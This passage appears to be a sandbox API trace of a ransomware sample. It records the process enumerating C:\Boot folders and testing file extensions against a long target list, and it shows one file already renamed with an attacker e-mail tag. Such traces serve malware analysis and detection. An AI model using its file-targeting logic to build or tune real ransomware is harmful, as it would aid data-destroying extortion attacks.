lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".iqy") returned 4 [0284.512] lstrcmpiW (lpString1=".iqy", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".j2c") returned 4 [0284.513] lstrcmpiW (lpString1=".j2c", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".j2k") returned 4 [0284.513] lstrcmpiW (lpString1=".j2k", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".java") returned 5 [0284.513] lstrcmpiW (lpString1=".java", lpString2="s.dll") returned -1 [0284.513] lstrlenW (lpString=".jp2") returned 4 [0284.513] lstrcmpiW (lpString1=".jp2", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".jpc") returned 4 [0284.513] lstrcmpiW (lpString1=".jpc", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".jpe") returned 4 [0284.513] lstrcmpiW (lpString1=".jpe", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".jpeg") returned 5 [0284.513] lstrcmpiW (lpString1=".jpeg", lpString2="s.dll") returned -1 [0284.513] lstrlenW (lpString=".jpf") returned 4 [0284.513] lstrcmpiW (lpString1=".jpf", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".jpg") returned 4 [0284.513] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".jpx") returned 4 [0284.513] lstrcmpiW (lpString1=".jpx", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".js") returned 3 [0284.513] lstrcmpiW (lpString1=".js", lpString2="dll") returned -1 [0284.513] lstrlenW (lpString=".jsf") returned 4 [0284.513] lstrcmpiW (lpString1=".jsf", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".json") returned 5 [0284.513] lstrcmpiW (lpString1=".json", lpString2="s.dll") returned -1 [0284.513] lstrlenW (lpString=".jsp") returned 4 [0284.513] lstrcmpiW (lpString1=".jsp", lpString2=".dll") returned 1 [0284.513] lstrlenW (lpString=".kdc") returned 4 [0284.513] lstrcmpiW (lpString1=".kdc", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".kmz") returned 4 [0284.514] lstrcmpiW (lpString1=".kmz", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".kwm") returned 4 [0284.514] lstrcmpiW (lpString1=".kwm", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".lasso") returned 6 [0284.514] lstrcmpiW (lpString1=".lasso", lpString2="es.dll") returned -1 [0284.514] lstrlenW (lpString=".lbi") returned 4 [0284.514] lstrcmpiW (lpString1=".lbi", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".lgf") returned 4 [0284.514] lstrcmpiW (lpString1=".lgf", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".lgp") returned 4 [0284.514] lstrcmpiW (lpString1=".lgp", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".log") returned 4 [0284.514] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".m1v") returned 4 [0284.514] lstrcmpiW (lpString1=".m1v", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".m4a") returned 4 [0284.514] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".m4v") returned 4 [0284.514] lstrcmpiW (lpString1=".m4v", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".max") returned 4 [0284.514] lstrcmpiW (lpString1=".max", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".md") returned 3 [0284.514] lstrcmpiW (lpString1=".md", lpString2="dll") returned -1 [0284.514] lstrlenW (lpString=".mda") returned 4 [0284.514] lstrcmpiW (lpString1=".mda", lpString2=".dll") returned 1 [0284.514] lstrlenW (lpString=".mdb") returned 4 [0284.514] lstrcmpiW (lpString1=".mdb", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mde") returned 4 [0284.515] lstrcmpiW (lpString1=".mde", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mdf") returned 4 [0284.515] lstrcmpiW (lpString1=".mdf", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mdw") returned 4 [0284.515] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mef") returned 4 [0284.515] lstrcmpiW (lpString1=".mef", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mft") returned 4 [0284.515] lstrcmpiW (lpString1=".mft", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mfw") returned 4 [0284.515] lstrcmpiW (lpString1=".mfw", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mht") returned 4 [0284.515] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mhtml") returned 6 [0284.515] lstrcmpiW (lpString1=".mhtml", lpString2="es.dll") returned -1 [0284.515] lstrlenW (lpString=".mka") returned 4 [0284.515] lstrcmpiW (lpString1=".mka", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mkidx") returned 6 [0284.515] lstrcmpiW (lpString1=".mkidx", lpString2="es.dll") returned -1 [0284.515] lstrlenW (lpString=".mkv") returned 4 [0284.515] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mos") returned 4 [0284.515] lstrcmpiW (lpString1=".mos", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mov") returned 4 [0284.515] lstrcmpiW (lpString1=".mov", lpString2=".dll") returned 1 [0284.515] lstrlenW (lpString=".mp3") returned 4 [0284.515] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".mp4") returned 4 [0284.516] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".mpeg") returned 5 [0284.516] lstrcmpiW (lpString1=".mpeg", lpString2="s.dll") returned -1 [0284.516] lstrlenW (lpString=".mpg") returned 4 [0284.516] lstrcmpiW (lpString1=".mpg", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".mpv") returned 4 [0284.516] lstrcmpiW (lpString1=".mpv", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".mrw") returned 4 [0284.516] lstrcmpiW (lpString1=".mrw", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".msg") returned 4 [0284.516] lstrcmpiW (lpString1=".msg", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".mxl") returned 4 [0284.516] lstrcmpiW (lpString1=".mxl", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".myd") returned 4 [0284.516] lstrcmpiW (lpString1=".myd", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".myi") returned 4 [0284.516] lstrcmpiW (lpString1=".myi", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".nef") returned 4 [0284.516] lstrcmpiW (lpString1=".nef", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".nrw") returned 4 [0284.516] lstrcmpiW (lpString1=".nrw", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".obj") returned 4 [0284.516] lstrcmpiW (lpString1=".obj", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".odb") returned 4 [0284.516] lstrcmpiW (lpString1=".odb", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".odc") returned 4 [0284.516] lstrcmpiW (lpString1=".odc", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".odm") returned 4 [0284.516] lstrcmpiW (lpString1=".odm", lpString2=".dll") returned 1 [0284.516] lstrlenW (lpString=".odp") returned 4 [0284.516] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".ods") returned 4 [0284.517] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".oft") returned 4 [0284.517] lstrcmpiW (lpString1=".oft", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".one") returned 4 [0284.517] lstrcmpiW (lpString1=".one", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".onepkg") returned 7 [0284.517] lstrcmpiW (lpString1=".onepkg", lpString2="ces.dll") returned -1 [0284.517] lstrlenW (lpString=".onetoc2") returned 8 [0284.517] lstrcmpiW (lpString1=".onetoc2", lpString2="aces.dll") returned -1 [0284.517] lstrlenW (lpString=".opt") returned 4 [0284.517] lstrcmpiW (lpString1=".opt", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".oqy") returned 4 [0284.517] lstrcmpiW (lpString1=".oqy", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".orf") returned 4 [0284.517] lstrcmpiW (lpString1=".orf", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".p12") returned 4 [0284.517] lstrcmpiW (lpString1=".p12", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".p7b") returned 4 [0284.517] lstrcmpiW (lpString1=".p7b", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".p7c") returned 4 [0284.517] lstrcmpiW (lpString1=".p7c", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".pam") returned 4 [0284.517] lstrcmpiW (lpString1=".pam", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".pbm") returned 4 [0284.517] lstrcmpiW (lpString1=".pbm", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".pct") returned 4 [0284.517] lstrcmpiW (lpString1=".pct", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".pcx") returned 4 [0284.517] lstrcmpiW (lpString1=".pcx", lpString2=".dll") returned 1 [0284.517] lstrlenW (lpString=".pdd") returned 4 [0284.517] lstrcmpiW (lpString1=".pdd", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pdf") returned 4 [0284.518] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pdp") returned 4 [0284.518] lstrcmpiW (lpString1=".pdp", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pef") returned 4 [0284.518] lstrcmpiW (lpString1=".pef", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pem") returned 4 [0284.518] lstrcmpiW (lpString1=".pem", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pff") returned 4 [0284.518] lstrcmpiW (lpString1=".pff", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pfm") returned 4 [0284.518] lstrcmpiW (lpString1=".pfm", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pfx") returned 4 [0284.518] lstrcmpiW (lpString1=".pfx", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".pgm") returned 4 [0284.518] lstrcmpiW (lpString1=".pgm", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".php") returned 4 [0284.518] lstrcmpiW (lpString1=".php", lpString2=".dll") returned 1 [0284.518] lstrlenW (lpString=".php3") returned 5 [0284.518] lstrcmpiW (lpString1=".php3", lpString2="s.dll") returned -1 [0284.518] lstrlenW (lpString=".php4") returned 5 [0284.518] lstrcmpiW (lpString1=".php4", lpString2="s.dll") returned -1 [0284.518] lstrlenW (lpString=".php5") returned 5 [0284.518] lstrcmpiW (lpString1=".php5", lpString2="s.dll") returned -1 [0284.518] lstrlenW (lpString=".phtml") returned 6 [0284.518] lstrcmpiW (lpString1=".phtml", lpString2="es.dll") returned -1 [0284.518] lstrlenW (lpString=".pict") returned 5 [0284.518] lstrcmpiW (lpString1=".pict", lpString2="s.dll") returned -1 [0284.518] lstrlenW (lpString=".pl") returned 3 [0284.519] lstrcmpiW (lpString1=".pl", lpString2="dll") returned -1 [0284.519] lstrlenW (lpString=".pls") returned 4 [0284.519] lstrcmpiW (lpString1=".pls", lpString2=".dll") returned 1 [0284.519] lstrlenW (lpString=".pm") returned 3 [0284.519] lstrcmpiW (lpString1=".pm", lpString2="dll") returned -1 [0284.519] lstrlenW (lpString=".png") returned 4 [0284.519] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0284.519] lstrlenW (lpString=".pnm") returned 4 [0284.519] lstrcmpiW (lpString1=".pnm", lpString2=".dll") returned 1 [0284.519] lstrlenW (lpString=".pot") returned 4 [0284.519] lstrcmpiW (lpString1=".pot", lpString2=".dll") returned 1 [0284.519] lstrlenW (lpString=".potm") returned 5 [0284.519] lstrcmpiW (lpString1=".potm", lpString2="s.dll") returned -1 [0284.519] lstrlenW (lpString=".potx") returned 5 [0284.519] lstrcmpiW (lpString1=".potx", lpString2="s.dll") returned -1 [0284.519] lstrlenW (lpString=".ppa") returned 4 [0284.519] lstrcmpiW (lpString1=".ppa", lpString2=".dll") returned 1 [0284.519] lstrlenW (lpString=".ppam") returned 5 [0284.519] lstrcmpiW (lpString1=".ppam", lpString2="s.dll") returned -1 [0284.519] lstrlenW (lpString=".ppm") returned 4 [0284.519] lstrcmpiW (lpString1=".ppm", lpString2=".dll") returned 1 [0284.519] lstrlenW (lpString=".pps") returned 4 [0284.519] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0284.519] lstrlenW (lpString=".ppsm") returned 5 [0284.519] lstrcmpiW (lpString1=".ppsm", lpString2="s.dll") returned -1 [0284.519] lstrlenW (lpString=".ppt") returned 4 [0284.519] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".pptm") returned 5 [0284.520] lstrcmpiW (lpString1=".pptm", lpString2="s.dll") returned -1 [0284.520] lstrlenW (lpString=".pptx") returned 5 [0284.520] lstrcmpiW (lpString1=".pptx", lpString2="s.dll") returned -1 [0284.520] lstrlenW (lpString=".prn") returned 4 [0284.520] lstrcmpiW (lpString1=".prn", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".ps") returned 3 [0284.520] lstrcmpiW (lpString1=".ps", lpString2="dll") returned -1 [0284.520] lstrlenW (lpString=".psb") returned 4 [0284.520] lstrcmpiW (lpString1=".psb", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".psd") returned 4 [0284.520] lstrcmpiW (lpString1=".psd", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".pst") returned 4 [0284.520] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".ptx") returned 4 [0284.520] lstrcmpiW (lpString1=".ptx", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".pub") returned 4 [0284.520] lstrcmpiW (lpString1=".pub", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".pwm") returned 4 [0284.520] lstrcmpiW (lpString1=".pwm", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".pxr") returned 4 [0284.520] lstrcmpiW (lpString1=".pxr", lpString2=".dll") returned 1 [0284.520] lstrlenW (lpString=".py") returned 3 [0284.520] lstrcmpiW (lpString1=".py", lpString2="dll") returned -1 [0284.520] lstrlenW (lpString=".qt") returned 3 [0284.520] lstrcmpiW (lpString1=".qt", lpString2="dll") returned -1 [0284.520] lstrlenW (lpString=".r3d") returned 4 [0284.520] lstrcmpiW (lpString1=".r3d", lpString2=".dll") returned 1 [0284.521] lstrlenW (lpString=".raf") returned 4 [0284.521] lstrcmpiW (lpString1=".raf", lpString2=".dll") returned 1 [0284.521] lstrlenW (lpString=".rar") returned 4 [0284.521] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0284.521] lstrlenW (lpString=".raw") returned 4 [0284.521] lstrcmpiW (lpString1=".raw", lpString2=".dll") returned 1 [0284.521] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5c6a0f65, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c6a0f65, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c6a0f65, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x100fc, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="BOOTSTAT.DAT.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="BOOTST~1.MSP")) returned 1 [0284.521] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0284.521] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0284.521] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.521] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f28 [0284.666] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.666] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.666] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.666] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.666] FindClose (in: hFindFile=0x3947f28 | out: hFindFile=0x3947f28) returned 1 [0284.667] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.667] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="da-DK", cAlternateFileName="")) returned 1 [0284.667] lstrlenW (lpString="C:\\Boot\\da-DK") returned 13 [0284.667] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Boot\\da-DK") returned 1 [0284.667] lstrlenW (lpString="da-DK") returned 5 [0284.667] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="da-DK") returned -1 [0284.667] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.667] lstrlenW (lpString="C:\\Boot\\da-DK") returned 13 [0284.667] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947c28 [0284.667] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.667] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.667] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.667] lstrlenW (lpString=".1cd") returned 4 [0284.668] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.668] lstrlenW (lpString=".3ds") returned 4 [0284.668] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0284.668] lstrlenW (lpString=".3fr") returned 4 [0284.668] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0284.668] lstrlenW (lpString=".3g2") returned 4 [0284.668] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0284.668] lstrlenW (lpString=".3gp") returned 4 [0284.668] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0284.668] lstrlenW (lpString=".7z") returned 3 [0284.668] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.668] lstrlenW (lpString=".accda") returned 6 [0284.668] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0284.668] lstrlenW (lpString=".accdb") returned 6 [0284.668] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0284.668] lstrlenW (lpString=".accdc") returned 6 [0284.668] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0284.668] lstrlenW (lpString=".accde") returned 6 [0284.668] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0284.668] lstrlenW (lpString=".accdt") returned 6 [0284.668] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0284.668] lstrlenW (lpString=".accdw") returned 6 [0284.668] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0284.669] lstrlenW (lpString=".adb") returned 4 [0284.669] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".adp") returned 4 [0284.669] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".ai") returned 3 [0284.669] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0284.669] lstrlenW (lpString=".ai3") returned 4 [0284.669] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".ai4") returned 4 [0284.669] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".ai5") returned 4 [0284.669] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".ai6") returned 4 [0284.669] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".ai7") returned 4 [0284.669] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".ai8") returned 4 [0284.669] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0284.669] lstrlenW (lpString=".anim") returned 5 [0284.669] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0284.669] lstrlenW (lpString=".arw") returned 4 [0284.669] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".as") returned 3 [0284.670] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0284.670] lstrlenW (lpString=".asa") returned 4 [0284.670] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".asc") returned 4 [0284.670] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".ascx") returned 5 [0284.670] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0284.670] lstrlenW (lpString=".asm") returned 4 [0284.670] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".asmx") returned 5 [0284.670] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0284.670] lstrlenW (lpString=".asp") returned 4 [0284.670] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".aspx") returned 5 [0284.670] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0284.670] lstrlenW (lpString=".asr") returned 4 [0284.670] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".asx") returned 4 [0284.670] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".avi") returned 4 [0284.670] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".avs") returned 4 [0284.670] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0284.670] lstrlenW (lpString=".backup") returned 7 [0284.671] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0284.671] lstrlenW (lpString=".bak") returned 4 [0284.671] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".bay") returned 4 [0284.671] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".bd") returned 3 [0284.671] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0284.671] lstrlenW (lpString=".bin") returned 4 [0284.671] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".bmp") returned 4 [0284.671] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".bz2") returned 4 [0284.671] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".c") returned 2 